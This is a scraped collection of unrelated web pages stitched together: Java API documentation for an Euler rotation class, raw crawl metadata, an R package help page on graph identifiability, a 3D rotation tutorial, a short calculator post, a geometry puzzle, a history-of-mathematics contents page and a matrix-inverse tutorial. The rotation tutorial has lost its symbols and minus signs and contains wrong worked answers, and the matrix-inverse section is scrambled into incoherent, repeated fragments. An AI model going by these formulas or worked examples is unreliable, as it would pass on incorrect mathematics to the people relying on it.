EulerSequence(ned2body, EulerSequenceIndicator.EULER321);\ndouble yaw = yawPitchRoll.getFirstRotation().getAngle();\ndouble pitch = yawPitchRoll.getSecondRotation().getAngle();\ndouble roll = yawPitchRoll.getThirdRotation().getAngle();``````\n`AngleAxisRotation`, `ElementaryRotation`, `Matrix3By3`, `Quaternion`, `UnitQuaternion`, `YawPitchRoll`\n• ### Method Summary\n\nAll Methods\nModifier and Type Method and Description\n`static boolean` ```equals(EulerSequence left, EulerSequence right)```\nReturns `true` if the two instances are exactly equal.\n`boolean` `equals(Object obj)`\nIndicates whether another object is exactly equal to this instance.\n`boolean` ```equalsEpsilon(EulerSequence other, double epsilon)```\nReturns `true` if all of the elements of this rotation are within `epsilon` of the same elements of the specified rotation.\n`boolean` `equalsType(EulerSequence other)`\nIndicates whether another instance of this type is exactly equal to this instance.\n`static AxisIndicator` `firstAxis(EulerSequenceIndicator sequence)`\nDetermines the first axis indicator from the provided `EulerSequenceIndicator`.\n`ElementaryRotation` `getFirstRotation()`\nGets the first rotation.\n`ElementaryRotation` `getSecondRotation()`\nGets the second rotation.\n`EulerSequenceIndicator` `getSequence()`\nGets the order of the axes rotations for this instance.\n`ElementaryRotation` `getThirdRotation()`\nGets the third rotation.\n`int` `hashCode()`\nReturns a hash code for this instance, which is suitable for use in 
hashing algorithms and data structures like a hash table.\n`static EulerSequenceIndicator` ```indicator(AxisIndicator first, AxisIndicator second, AxisIndicator third)```\n`EulerSequence` `invert()`\nInverts this instance, yielding a new `EulerSequence`.\n`static boolean` ```notEquals(EulerSequence left, EulerSequence right)```\nReturns `true` if the two instances are not exactly equal.\n`static AxisIndicator` `secondAxis(EulerSequenceIndicator sequence)`\nDetermines the second axis indicator from the provided `EulerSequenceIndicator`.\n`static AxisIndicator` `thirdAxis(EulerSequenceIndicator sequence)`\nDetermines the third axis indicator from the provided `EulerSequenceIndicator`.\n`String` `toString()`\nReturns the value of this set of `EulerSequence` coordinates in the form \"first rotation, second rotation, third rotation\"\n• ### Methods inherited from class java.lang.Object\n\n`clone, finalize, getClass, notify, notifyAll, wait, wait, wait`\n• ### Constructor Detail\n\n• #### EulerSequence\n\n`public EulerSequence()`\nInitializes a new instance.\n• #### EulerSequence\n\n```public EulerSequence(double angle1,\ndouble angle2,\ndouble angle3,\n@Nonnull\nEulerSequenceIndicator sequence)```\nInitializes an `EulerSequence` from the provided angles and sequence.\nParameters:\n`angle1` - The first angle.\n`angle2` - The second angle.\n`angle3` - The third angle.\n`sequence` - The sequence.\n• #### EulerSequence\n\n```public EulerSequence(@Nonnull\nElementaryRotation firstRotation,\n@Nonnull\nElementaryRotation secondRotation,\n@Nonnull\nElementaryRotation thirdRotation)```\nParameters:\n`firstRotation` - The first rotation.\n`secondRotation` - The second rotation.\n`thirdRotation` - The third rotation.\n• #### EulerSequence\n\n```public EulerSequence(@Nonnull\nMatrix3By3 matrix,\n@Nonnull\nEulerSequenceIndicator sequence)```\nInitializes an `EulerSequence` from the provided `Matrix3By3` and sequence.\n\nNote that the `matrix` must be an orthogonal rotation matrix.\n\nParameters:\n`matrix` - The orthogonal rotation matrix.\n`sequence` - The sequence.\n• #### EulerSequence\n\n```public EulerSequence(@Nonnull\nUnitQuaternion quaternion,\n@Nonnull\nEulerSequenceIndicator sequence)```\nInitializes an `EulerSequence` from the provided `UnitQuaternion` and sequence.\nParameters:\n`quaternion` - The unit quaternion.\n`sequence` - The sequence.\n• #### EulerSequence\n\n```public EulerSequence(@Nonnull\nAngleAxisRotation rotation,\n@Nonnull\nEulerSequenceIndicator sequence)```\nInitializes an `EulerSequence` from the provided `AngleAxisRotation` and sequence.\nParameters:\n`rotation` - The rotation.\n`sequence` - The sequence.\n• ### Method Detail\n\n• #### indicator\n\n```@Nonnull\npublic static EulerSequenceIndicator indicator(@Nonnull\nAxisIndicator first,\n@Nonnull\nAxisIndicator second,\n@Nonnull\nAxisIndicator third)```\nParameters:\n`first` - The first axis of rotation.\n`second` - The second axis of rotation.\n`third` - The third axis of rotation.\nReturns:\nThe indicator.\n• #### firstAxis\n\n```@Nonnull\npublic static AxisIndicator firstAxis(@Nonnull\nEulerSequenceIndicator sequence)```\nDetermines the first axis indicator from the provided `EulerSequenceIndicator`.\nParameters:\n`sequence` - The order of the axes of rotation.\nReturns:\nThe first axis indicator.\n• #### secondAxis\n\n```@Nonnull\npublic static AxisIndicator secondAxis(@Nonnull\nEulerSequenceIndicator sequence)```\nDetermines the second axis indicator from the provided `EulerSequenceIndicator`.\nParameters:\n`sequence` - 
The order of the axes of rotation.\nReturns:\nThe second axis indicator.\n• #### thirdAxis\n\n```@Nonnull\npublic static AxisIndicator thirdAxis(@Nonnull\nEulerSequenceIndicator sequence)```\nDetermines the third axis indicator from the provided `EulerSequenceIndicator`.\nParameters:\n`sequence` - The order of the axes of rotation.\nReturns:\nThe third axis indicator.\n• #### getFirstRotation\n\n```@Nonnull\npublic final ElementaryRotation getFirstRotation()```\nGets the first rotation.\n• #### getSecondRotation\n\n```@Nonnull\npublic final ElementaryRotation getSecondRotation()```\nGets the second rotation.\n• #### getThirdRotation\n\n```@Nonnull\npublic final ElementaryRotation getThirdRotation()```\nGets the third rotation.\n• #### getSequence\n\n```@Nonnull\npublic final EulerSequenceIndicator getSequence()```\nGets the order of the axes rotations for this instance.\n• #### equals\n\n`public boolean equals(Object obj)`\nIndicates whether another object is exactly equal to this instance.\nOverrides:\n`equals` in class `Object`\nParameters:\n`obj` - The object to compare to this instance.\nReturns:\n`true` if `obj` is an instance of this type and represents the same value as this instance; otherwise `false`.\n`Object.hashCode()`, `HashMap`\n• #### equalsType\n\n```public final boolean equalsType(@Nonnull\nEulerSequence other)```\nIndicates whether another instance of this type is exactly equal to this instance.\nSpecified by:\n`equalsType` in interface `IEquatable<EulerSequence>`\nParameters:\n`other` - The instance to compare to this instance.\nReturns:\n`true` if `other` represents the same value as this instance; otherwise `false`.\n• #### equalsEpsilon\n\n```public final boolean equalsEpsilon(@Nonnull\nEulerSequence other,\ndouble epsilon)```\nReturns `true` if all of the elements of this rotation are within `epsilon` of the same elements of the specified rotation. That is, in order for the rotations to be considered equal (and for this function to return `true`), the absolute value of the difference between each of their elements must be less than or equal to `epsilon`.\nSpecified by:\n`equalsEpsilon` in interface `IEquatableEpsilon<EulerSequence>`\nParameters:\n`other` - The rotation to compare to this rotation.\n`epsilon` - The largest difference between the elements of the rotations for which they will be considered equal.\nReturns:\n`true` if the rotations are equal as defined by the epsilon value.\n• #### toString\n\n`public String toString()`\nReturns the value of this set of `EulerSequence` coordinates in the form \"first rotation, second rotation, third rotation\"\nOverrides:\n`toString` in class `Object`\nReturns:\nThe string.\n• #### equals\n\n```public static boolean equals(@Nonnull\nEulerSequence left,\n@Nonnull\nEulerSequence right)```\nReturns `true` if the two instances are exactly equal.\nParameters:\n`left` - The instance to compare to `right`.\n`right` - The instance to compare to `left`.\nReturns:\n`true` if `left` represents the same value as `right`; otherwise `false`.\n• #### notEquals\n\n```public static boolean notEquals(@Nonnull\nEulerSequence left,\n@Nonnull\nEulerSequence right)```\nReturns `true` if the two instances are not exactly equal.\nParameters:\n`left` - The instance to compare to `right`.\n`right` - The instance to compare to `left`.\nReturns:\n`true` if `left` does not represent the same value as `right`; otherwise `false`." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6439353,"math_prob":0.73381263,"size":9494,"snap":"2023-14-2023-23","text_gpt3_token_len":1952,"char_repetition_ratio":0.2548999,"word_repetition_ratio":0.24269265,"special_character_ratio":0.17010744,"punctuation_ratio":0.132206,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9812698,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-31T01:34:31Z\",\"WARC-Record-ID\":\"<urn:uuid:1db1f311-93c4-4377-a6cc-f8116d2dc8f0>\",\"Content-Length\":\"61223\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f9d5785c-b8f5-451f-85a1-ce2c89ab09d1>\",\"WARC-Concurrent-To\":\"<urn:uuid:1bd7b2c8-5dc0-4d9c-a7f9-dfe4b7b16542>\",\"WARC-IP-Address\":\"65.89.176.231\",\"WARC-Target-URI\":\"https://help.agi.com/STKComponentsJava/Javadoc/agi-foundation-coordinates-EulerSequence.html\",\"WARC-Payload-Digest\":\"sha1:VWDOPQ5E2I4YZDKZXSRP7DZSKBGGK5WF\",\"WARC-Block-Digest\":\"sha1:O3J4HSFR5UTFHMWS33RUHXX2FRZITYIE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224646181.29_warc_CC-MAIN-20230530230622-20230531020622-00373.warc.gz\"}"}
https://rdrr.io/github/Lucaweihs/SEMID/man/graphID.htcID.html
[ "# graphID.htcID: Determines if a mixed graph is HTC-identifiable. In Lucaweihs/SEMID: Identifiability of Linear Structural Equation Models\n\n## Description\n\nUses the half-trek criterion of Foygel, Draisma, and Drton (2013) to check if an input mixed graph is generically identifiable.\n\n## Usage\n\n `1` ```graphID.htcID(L, O) ```\n\n## Arguments\n\n `L` Adjacency matrix for the directed part of the path diagram/mixed graph; an edge pointing from i to j is encoded as L[i,j]=1 and the lack of an edge between i and j is encoded as L[i,j]=0. There should be no directed self loops, i.e. no i such that L[i,i]=1. `O` Adjacency matrix for the bidirected part of the path diagram/mixed graph. Edges are encoded as for the L parameter. Again there should be no self loops. Also this matrix will be coerced to be symmetric so it is only necessary to specify an edge once, i.e. if O[i,j]=1 you may, but are not required to, also have O[j,i]=1.\n\n## Value\n\nThe vector of HTC-identifiable nodes.\n\n## References\n\nFoygel, R., Draisma, J., and Drton, M. (2012) Half-trek criterion for generic identifiability of linear structural equation models. Ann. Statist. 40(3): 1682-1713.\n\nLucaweihs/SEMID documentation built on June 3, 2019, 2:13 a.m." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83094776,"math_prob":0.85751617,"size":1105,"snap":"2020-34-2020-40","text_gpt3_token_len":295,"char_repetition_ratio":0.08719346,"word_repetition_ratio":0.021978023,"special_character_ratio":0.25791857,"punctuation_ratio":0.168,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9723158,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-01T12:23:51Z\",\"WARC-Record-ID\":\"<urn:uuid:c16f4761-681b-4589-9f05-fef0304f03ef>\",\"Content-Length\":\"44697\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:667e4432-8581-476f-ab91-49a53a682362>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e3228dc-6c27-4102-96cc-8fe58812b9c0>\",\"WARC-IP-Address\":\"51.81.81.92\",\"WARC-Target-URI\":\"https://rdrr.io/github/Lucaweihs/SEMID/man/graphID.htcID.html\",\"WARC-Payload-Digest\":\"sha1:V6W6UILRFRPEOOEO64DVSW3MWEWPW2W5\",\"WARC-Block-Digest\":\"sha1:7BI47JLY6QF5UTOAPSVM5KQZYP5T2AW4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600402131412.93_warc_CC-MAIN-20201001112433-20201001142433-00665.warc.gz\"}"}
https://amansingh-javatpoint.medium.com/3d-rotation-in-computer-graphics-b1ab09d9ee1?source=user_profile---------7----------------------------
[ "# 3D Rotation in Computer Graphics\n\nThe 3D rotation is different from 2D rotation. In 3D Rotation we also have to define the angle of Rotation with the axis of Rotation.\n\nFor Example-Let us assume,\n\nThe initial coordinates of an object = (x0, y0, z0)\n\nThe Initial angle from origin = ?\n\nThe Rotation angle = ?\n\nThe new coordinates after Rotation = (x1, y1, z1)\n\nIn Three-dimensional plane we can define Rotation by following three ways\n\n1. X-axis Rotation: We can rotate the object along x-axis. We can rotate an object by using following equation-\n\nX1 = x0\n\nY1 = y0 cos?z0 x sin?\n\nZ1 = y0 x sin?+ z0 x cos?\n\nWe can represent 3D rotation in the form of matrix-\n\n2. Y-axis Rotation: We can rotate the object along y-axis. We can rotate an object by using following equation-\n\nx1 = z0 x sin? + x0 x cos?\n\ny1 = y0\n\nz1 = y0 x cos? x0 x sin?\n\nWe can represent 3D rotation in the form of matrix\n\n3. Z-axis Rotation: We can rotate the object along z-axis. We can rotate an object by using following equation-\n\nx1 = x0 x cos? y0 x sin?\n\ny1 = x0 x sin? + y0 x cos?\n\nz1 = z0\n\nWe can represent 3D rotation in the form of matrix\n\nExample: A Point has coordinates P (2, 3, 4) in x, y, z-direction. The Rotation angle is 90 degrees. Apply the rotation in x, y, z direction, and find out the new coordinates of the point?\n\nSolution: The initial coordinates of point = P (x0, y0, z0) = (2, 3, 4)\n\nRotation angle (?) = 90°\n\nFor x-axis\n\nLet the new coordinates = (x1, y1, z1) then,\n\nx1= x0 = 2\n\ny1= y0 x cos? — z0 x sin? = 3 x cos90°– 4 x sin90° = 3 x 0–4 x 1 = -4\n\nz1= y0 x sin? + z0 x cos? = 3 x sin90°+ 4 x cos90° = 3 x 1 + 4 x 0 = 3\n\nThe new coordinates of point = (2, -4, 3)\n\nFor y-axis\n\nLet the new coordinates = (x1, y1, z1) then,\n\nX1= z0 x sin? + x0 x cos? = 4 x sin90° + 2 x cos90° = 4 x 1 + 2 x 0 = 4\n\ny1= y0 = 3\n\nz1= y0 x cos&? — x0 x sin? = 3 x cos90°– 2 x sin90° = 3 x 0–4 x 0 = 0\n\nThe new coordinates of point = (4, 3, 0)\n\nFor z-axis\n\nLet the new coordinates = (x1, y1, z1) then,\n\nx1= x0 x cos? — y0 x sin? = 2 x cos90° — 3 x sin90° = 2 x 0 + 3 x 1 = 3\n\ny1= x0 x sin? + y0 x cos? = 2 x sin90° ­+ 3 x cos90° = 2 x 1 + 3 x 0 = 2\n\nz1= z0 =4\n\nThe New Coordinates of points = (3, 2, 4)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.734415,"math_prob":1.000001,"size":2139,"snap":"2023-40-2023-50","text_gpt3_token_len":812,"char_repetition_ratio":0.18360655,"word_repetition_ratio":0.18255578,"special_character_ratio":0.40719962,"punctuation_ratio":0.13957936,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999777,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-03T01:48:15Z\",\"WARC-Record-ID\":\"<urn:uuid:713518e5-ab4c-424b-b5a5-05aba4a5f7ea>\",\"Content-Length\":\"220618\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c6b28f7-1bde-47af-8ae7-7c513d2e1f55>\",\"WARC-Concurrent-To\":\"<urn:uuid:bd530a39-630b-4b82-914a-d4ad6f96d89d>\",\"WARC-IP-Address\":\"162.159.153.4\",\"WARC-Target-URI\":\"https://amansingh-javatpoint.medium.com/3d-rotation-in-computer-graphics-b1ab09d9ee1?source=user_profile---------7----------------------------\",\"WARC-Payload-Digest\":\"sha1:OCRVHYER4STLO732X3S4PYPOLE4EJD7D\",\"WARC-Block-Digest\":\"sha1:HGP4PSWOHKDKDT3LZIKHT7MKHBHAX6SR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100476.94_warc_CC-MAIN-20231202235258-20231203025258-00660.warc.gz\"}"}
http://www.crystaltenn.com/2016/08/simple-calculator-with-order-of.html
[ "## Simple Calculator with Order of Operations in C#\n\nHere is the Calculator with order of operations for multiplication, division, addition, and subtraction. No parenthesis, exponents, or other things included. This is using the tree method. We check for the operation that would be done last from right to left, and this is the first node of the tree. Keep in mind: \"multiplication and division are of equal precedence, as are addition and subtraction.\" Here is an example of how the tree works: Source: http://math.hws.edu/eck/cs225/s03/binary_trees/expressionTree.gif\n\nThis is the Program.cs file below.\n\nThis is some class file, for ex. Calc.cs below:" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93453777,"math_prob":0.83156896,"size":641,"snap":"2019-51-2020-05","text_gpt3_token_len":141,"char_repetition_ratio":0.11930926,"word_repetition_ratio":0.0,"special_character_ratio":0.21372855,"punctuation_ratio":0.18045112,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99224097,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-05T19:56:15Z\",\"WARC-Record-ID\":\"<urn:uuid:38a9f9a2-7d7c-4630-8f8c-d49bdae6beea>\",\"Content-Length\":\"82689\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ac706b3a-1552-46a0-99de-a7fa0277cb5f>\",\"WARC-Concurrent-To\":\"<urn:uuid:0ef5877a-7c72-4d18-b3e2-72e5de18f853>\",\"WARC-IP-Address\":\"172.217.15.115\",\"WARC-Target-URI\":\"http://www.crystaltenn.com/2016/08/simple-calculator-with-order-of.html\",\"WARC-Payload-Digest\":\"sha1:TRD74LJWXKP5T3A2XIVSWFCBKQEUHZ2Z\",\"WARC-Block-Digest\":\"sha1:CLP3V3YXOTHDBW2VO3WC6JNMMOTBFAYK\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540482038.36_warc_CC-MAIN-20191205190939-20191205214939-00180.warc.gz\"}"}
https://brilliant.org/problems/easy-angles-2/
[ "# Easy Angles 2\n\nGeometry Level 3\n\nIn $\\triangle{ABC}$, $\\angle{A}$ is $30^\\circ$ and $\\angle{B}$ is $80^\\circ$. What is the measure of the complement of $\\angle{C}$ in degrees?\n\n×" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.736836,"math_prob":1.0000069,"size":269,"snap":"2021-04-2021-17","text_gpt3_token_len":105,"char_repetition_ratio":0.15849057,"word_repetition_ratio":0.0,"special_character_ratio":0.28996283,"punctuation_ratio":0.2238806,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99995077,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-16T00:19:10Z\",\"WARC-Record-ID\":\"<urn:uuid:138e2594-af39-4b5c-8ef8-9201297db852>\",\"Content-Length\":\"38878\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b3b185b7-5ba3-415a-ad5a-55b5b1c974b8>\",\"WARC-Concurrent-To\":\"<urn:uuid:7a7f4d5e-9c62-4115-a307-ab8c0d649e09>\",\"WARC-IP-Address\":\"104.20.34.242\",\"WARC-Target-URI\":\"https://brilliant.org/problems/easy-angles-2/\",\"WARC-Payload-Digest\":\"sha1:NAC5NRYQODWHJ2SMXLEXASAW7G7YIWEO\",\"WARC-Block-Digest\":\"sha1:FZFWQFTGXZFHAPG37FXKBQMPBVM2C2EV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703497681.4_warc_CC-MAIN-20210115224908-20210116014908-00744.warc.gz\"}"}
https://www.maa.org/press/periodicals/convergence/introducing-the-history-of-mathematics-an-italian-experience-using-original-documents-contents-of
[ "", null, "# Introducing the History of Mathematics: An Italian Experience Using Original Documents - Contents of Students' Volume\n\nAuthor(s):\n\nAs a brief introduction to the content and format of Fare mathematica some  excerpts are given in English translation:\n\nCONTENTS\n\nPreface by Fulvia Furinghetti\n\n.\n\nIntroduction for students.\n\nCHAPTER 1: FROM ARITHMETIC TO ALGEBRA - Numeration: Egyptians; Babylonians; Greeks; Romans; Mayas; Indians, at last; Who invented binary numbers? - Operations and non-negative integers: Middle Ages and Renaissance - Not only non-negative numbers: Fractions in Egypt: the Horus’ eye; How Egyptians wrote fractions; Decimals and Arabs; Decimals in Europe - The arithmetic triangle: Chinese, Arabs, Europeans… - Curious problems: Let’s solve together; Other problems: the text; Other problems: the solutions - “False” numbers: In sixteenth-century Italy; A woman grapples with mathematics - From words to symbols: A great Arabian mathematician; Diophantus left a mark; All of them are equations; A “recipe” to solve an equation; The science of “literal calculus”; Philosopher, physician and… mathematician - Problems and equations: Linear and quadratic problems - Bombelli and the number i: Is it a number? - Logarithms: An ancient idea; An authoritative answer - And more…  evolution of symbols.\n\nCHAPTER 2 – FACES OF GEOMETRY - Arithmetic and geometry: figurate numbers: Polygonal numbers; Pythagorean terns; Ingenious ways to obtain Pythagorean terns - Pythagorean theorem: A walk through history: sides and squares…; … a problem in the Renaissance…; …problems and equations - Far points: About towers and other buildings; How to bore a tunnel and not come out in the wrong place - Square root of 2: How did they do it? - pi: What is the true value? - Archimedes: A volley of propositions; The area of the circle and the method of exhaustion - Cartesian coordinates?…: In the fourteenth century; One of the fathers - Geometry, of Euclid and not: An authoritative introduction, but…; The Elements: almost a Bible; Two millennia later - Trigonometry: From a sixteenth-century book - What is topology?: A new geometry; The problem of Königsberg’s bridges; The explanation of Euler - And more… solid numbers.\n\nCHAPTER 3: THEMES OF MODERN MATHEMATICS - Logic: an ancient but current science: What are logical connectives?; The art of… reasoning; Mathematics takes possession of logic - Logic to build numbers: Gottlob Frege and Bertrand Russell - Let’s measure uncertainty: Galileo and a problem about the casting of three dice; Epistolary interchanges; The classical conception of probability; Other conceptions of probability - Infinity: Runners, arrows, hares, tortoise,…; The whole is not greater than the part; Infinite is a source of other paradoxes; Let’s arrange our knowledge - Cantor’s paradise: Real numbers are more than integers; Cantor in Hilbert’s opinion - Infinitesimals before Newton: The circle; The torus; The indivisibles - Limits, derivatives, integrals (I’m sorry if it is too little): Isaac Newton - We don’t stop… history continues…\n\nAdriano Dematte (Univ. of Genoa), \"Introducing the History of Mathematics: An Italian Experience Using Original Documents - Contents of Students' Volume,\" Convergence (February 2010), DOI:10.4169/loci002856\n\n## Dummy View - NOT TO BE DELETED\n\n•", null, "•", null, "•", null, "•", null, "•", null, "" ]
[ null, "https://px.ads.linkedin.com/collect/", null, "https://www.maa.org/sites/default/files/21.03.08%20MAA%20Press%20Book.png", null, "https://www.maa.org/sites/default/files/Dan%20Kalman%20VSI%20Slider.png", null, "https://www.maa.org/sites/default/files/22.03.11%20MathFest%202022%20Registration%20Open_0.png", null, "https://www.maa.org/sites/default/files/EOY%20Homepage%20Slider.png", null, "https://www.maa.org/sites/default/files/Service%20Center%20Update%20Homepage%20Slider.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8012514,"math_prob":0.7561549,"size":2984,"snap":"2022-27-2022-33","text_gpt3_token_len":683,"char_repetition_ratio":0.09932886,"word_repetition_ratio":0.0,"special_character_ratio":0.21213137,"punctuation_ratio":0.18634686,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9724734,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-27T02:32:34Z\",\"WARC-Record-ID\":\"<urn:uuid:dddc6865-6cac-468b-ab1a-56a6fe44d17d>\",\"Content-Length\":\"115367\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3f6f58a6-4251-4ab0-ba74-40f2e83ad1e1>\",\"WARC-Concurrent-To\":\"<urn:uuid:20bc40d8-d564-4f95-b1cc-d519b2768af3>\",\"WARC-IP-Address\":\"172.67.186.65\",\"WARC-Target-URI\":\"https://www.maa.org/press/periodicals/convergence/introducing-the-history-of-mathematics-an-italian-experience-using-original-documents-contents-of\",\"WARC-Payload-Digest\":\"sha1:4O5PFOFDNCK7HAG4ZR5NWOAP4MYDMGKE\",\"WARC-Block-Digest\":\"sha1:L2XTBQKLFZWNPMRRCK6E35NPC4UQDN5O\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103324665.17_warc_CC-MAIN-20220627012807-20220627042807-00544.warc.gz\"}"}
https://www.travel-rs.info/5n6ryh35/article.php?7a495e=inverse-of-n-n-matrix
[ "# inverse of n n matrix\n\nP2 Cofactors of A are: Example 2 :-Find the inverse of the matrix, Solution :-Here,Expanding using 1st row, we get, = 1(6 –1) –2(4 –3) + 3(2 – 9) First calculate deteminant of matrix. where a, b, c and d are numbers. Let A be the name of our nxn matrix: non-square matrices have no inverse. A 3 x 3 matrix has 3 rows and 3 columns. Useful … E the above discussion, and even continue the above problem. pivoting skills. Note 3 : Compare the above 3 steps for According to the inverse of a matrix definition, a square matrix A of order n is said to be invertible if there exists another square matrix B of order n such that AB = BA = I. where I is the identity of order n*n. Identity matrix of order 2 is denoted by Matrix inversion is the process of finding the matrix B that satisfies the prior … Augment the nxn matrix A with the nxn Let us first define the inverse of a matrix. those used in GAUSS/JORDAN. = 5 – 2 × 1 + 3 × (–7) To find the inverse of a matrix A, i.e A-1 we shall first define the adjoint of a matrix. A-1, Acharya Nikatan, Mayur Vihar, Phase-1, Central Market, New Delhi-110091. In in the left We must find the inverse of the matrix A at the right P1, so the pivot The inverse matrix A-1 of a matrix A is such that the product AxA-1 is equal to the identity matrix. Copyright © 2020 Entrancei. 3x3 identity matrix in blue It is represented by M-1. The matrix Y is called the inverse of X. Here we find out inverse of a graph matrix using adjoint matrix and its determinant. If set A has p no. Note : Let A be square matrix of order n. Then, A −1 exists if and only if A is non-singular. Let us find out here. An invertible matrix is also sometimes … Next pivot on \"3\" in the 2-2 position below, encircled in red Define the matrix c, where. Note 2 : Check out Prof McFarland's The inverse is: The inverse of a general n × n matrix A can be found by using the following equation. B = bij) are known as the cofactors of a. So it must … Let A be the name of our nxn matrix: non-square matrices have no inverse. see Text ( Rolf, Pg 163) or scroll below differently from our text: follow Prof McFarland's naming style.   . (REDUCED)DIAGONALFORM The inverse of a matrix is just a reciprocal of the matrix as we do in normal arithmetic for a single number which is used to solve the equations to find the value of unknown variables. Definition of a g-Inverse. When step above is done, the right half of the latest matrix. If no such interchange produces i.e.the inverse A -1 of a matrix A is given by The inverse is defined only for nonsingular square matrices. We employ the latter, here. Inverse of a matrix can find out in many ways. If A is a non-singular square matrix, then there exists an inverse matrix A-1, which satisfies the following condition: it's row with a lower row. Professor McFarland names (2-2 position) is now \"1\".   ===> [ In Below is the same matrix A, augmented by   In more detail, suppose R is a commutative ring and A is an n × n matrix with entries from R. The (i,j)-minor of A, denoted M ij, is the determinant of the (n − 1) × (n − 1) matrix that results from deleting row i and column j of A. The transpose of c (i.e. row operations just a bit portion of the augmented matrix. Now, if A is matrix of a x b order, then the inverse of matrix A will be represented as A-1. We can obtain matrix inverse by following method. The reciprocal or inverse of a nonzero number a is the number b which is characterized by the property that ab = 1. 
In ; A generalized inverse (g-inverse) of an m´ n matrix A over a field F is an n´ m matrix G over F such that Gb is a solution of the system Ax = b of linear equations whenever b is such that this system is consistent. Now the question arises, how to find that inverse of matrix A is A-1. Next we perform Let us try an example: How do we know this is the right answer? The matrix A can be factorized as the product of an orthogonal matrix Q (m×n) and an upper triangular matrix R (n×n), thus, solving (1) is equivalent to solve Rx = Q^T b We now matrix if m = n and is known as a square matrix of order ‘n’. those used in GAUSS/JORDAN. See an example below, and try the A ij = (-1) ij det(M ij), where M ij is the (i,j) th minor matrix obtained from A after removing the ith row and jth column. A singular matrix is the one in which the determinant is not equal to zero. Next we perform pivot on the the above discussion, and even continue the above problem. Below are the row operations required for the first which is called the inverse of a such that: This is a C++ program to Find Inverse of a Graph Matrix. Inverse of a Matrix Definition. as you use row operations. pivoting Let A be a square matrix of order n. If there exists a square matrix B of order n such that. element in the 3-3 position, encircled in red below The result of multiplying the matrix by its inverse is commutative, meaning that it doesn't depend on the order of multiplication – A-1 xA is equal to AxA-1. Definition. The inverse is:the inverse of a general n × n matrix a can be found by using the following equation.where the adj (a) denotes the adjoint of a matrix.   There are mainly two ways to obtain the inverse matrix. For a nonsingular square matrix, the inverse is the quotient of the adjoint of the matrix and the determinant of the matrix. AB = BA = I n. then the matrix B is called an inverse of A. EXAMPLE OF FINDING THE INVERSE OF A MATRIX A C program to find Inverse of n x n matrix 2). A matrix X is invertible if there exists a matrix Y of the same size such that X Y = Y X = I n, where I n is the n-by-n identity matrix. take for example an arbitrary 2×2 matrix a whose determinant (ad − bc) is not equal to zero.where a, b, c and d are numbers. are below For instance, the inverse of 7 is 1 / 7. A square matrix is singular only when its determinant is exactly zero. Let A be an n × n (square) matrix. -1 1-2 It is easy to check the adjugate is the inverse times the determinant, −6. between this method and GAUSS/JORDAN method, used to solve a system of C Program to calculate inverse of a matrix 5). Well, for a 2x2 matrix the inverse is: In other words: swap the positions of a and d, put negatives in front of b and c, and divide everything by the determinant (ad-bc). 321 In such a case matrix B is known as the inverse of matrix A. Inverse of matrix A is symbolically represented by 'A-1'. Learn more about inverse matrix . Note 1 : interactivePIVOT ENGINE The terms of b (i.e. (iv) A square matrix B = [b ij] n×n is said to be a diagonal matrix if its all non diagonal elements are zero, that is a matrix B = [b ij] n×n is said to be a diagonal matrix if b ij = 0, when i ≠ j. The questions to find the Inverse of matrix can be asked as, 1). GENERALIZED INVERSES . If in a circle of radius r arc length of l subtend θ radian angle at centre then, Conversion of radian to degree and vice versa. This of the identity matrix of elements and set 